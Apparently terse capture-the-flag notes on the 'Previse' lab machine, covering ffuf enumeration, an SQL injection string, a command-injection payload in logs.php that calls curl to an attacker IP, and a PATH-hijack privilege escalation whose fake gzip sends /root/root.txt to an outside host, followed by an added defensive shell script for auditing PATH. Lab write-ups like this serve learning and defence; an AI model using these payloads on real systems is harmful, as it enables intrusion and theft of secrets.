Previse
Enumeration
ffuf -w /media/lrb/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.previse.htb" -u http://previse.htb -fc 301
ffuf -w ../burp-parameter-names.txt -u http://10.10.11.104/config.php?FUZZ=abcd
# Following endpoints are available:
http://10.10.11.104/nav.php
http://10.10.11.104/accounts.php
http://10.10.11.104/files.php
http://10.10.11.104/status.php
http://10.10.11.104/file_logs.php
1623978778,m4lwhere,32 http://10.10.11.104/download.php?file=32
cat file_logs | cut -d, -f3 | sort -n | uniq
config.php $user = 'root'; $passwd = '[redacted]';
user12';-- -
SELECT * FROM accounts WHERE username = '{$username}';
grep -ir "$_POST"
-logs.php delim=comma;curl+http%3a//10.10.14.2%3a7906
-mysql: the stored password contains a salt and icon characters in its text, so select it base64-encoded: select TO_BASE64(password) from accounts where username="m4lwhere";
2. Priv Esc [ creating gzip executable in custom location ]
export PATH=/home/m4lwhere:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
nano gzip
curl http://10.10.14.5:7908/$(cat /root/root.txt)
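The step above depends on a privileged job resolving `gzip` through a caller-controlled PATH. The following added example (not part of the original notes or the box's own script) shows the defensive side in POSIX sh: auditing a PATH string and running binaries only by absolute path from a fixed list. `TRUSTED_PATH` and the function names are assumptions.

```shell
#!/bin/sh
# Added example, not the box's script. TRUSTED_PATH and the function names
# are assumptions chosen for illustration.
TRUSTED_PATH="/usr/sbin:/usr/bin:/sbin:/bin"

# audit_path PATH_STRING: print each entry a root-run script must not trust.
audit_path() (
    IFS=:; set -f; PATH=$TRUSTED_PATH
    for dir in $1; do
        case "$dir" in
            /*) ;;
            *) printf 'relative: %s\n' "$dir"; continue ;;
        esac
        [ -d "$dir" ] || continue
        # "$dir/." follows a symlinked directory; flag non-root owner or g/o write.
        if [ -n "$(find "$dir/." -maxdepth 0 \( ! -user 0 -o -perm -020 -o -perm -002 \) 2>/dev/null)" ]; then
            printf 'untrusted: %s\n' "$dir"
        fi
    done
)

# resolve_trusted NAME: print the absolute path of NAME from TRUSTED_PATH only.
resolve_trusted() (
    case "$1" in ''|*/*) exit 1 ;; esac   # bare command names only
    IFS=:; set -f
    for dir in $TRUSTED_PATH; do
        if [ -f "$dir/$1" ] && [ -x "$dir/$1" ]; then
            printf '%s\n' "$dir/$1"
            exit 0
        fi
    done
    exit 1
)

# run_trusted NAME [ARGS...]: run NAME by absolute path with PATH pinned.
run_trusted() {
    _bin=$(resolve_trusted "$1") || {
        printf 'refusing %s: not in TRUSTED_PATH\n' "$1" >&2
        return 127
    }
    shift
    PATH=$TRUSTED_PATH "$_bin" "$@"
}

# In the privileged script: run_trusted gzip -c "$log" > "$log.gz"
```

Run against the PATH exported in these notes, `audit_path` reports `/home/m4lwhere` as untrusted because the directory is not owned by uid 0.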
Path:
• nav.php contains in-session app. pages
• create user using response modification
• Enumerating files by file ID
• Possible cmd injection - Yup 'logs.php'
• Horizontal PE to m4lwhere - hashed password in mysql DB is the same for system access
• to root via cron ?